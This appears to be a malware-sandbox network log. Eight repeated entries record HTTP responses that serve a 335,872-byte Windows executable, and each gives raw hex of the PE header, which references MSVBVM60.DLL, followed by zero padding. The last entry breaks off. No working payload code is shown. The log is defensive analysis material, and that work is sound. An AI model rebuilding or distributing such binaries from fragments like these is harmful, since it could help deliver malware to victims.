          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:03 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:07 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:08 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:11 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:16 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:22 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 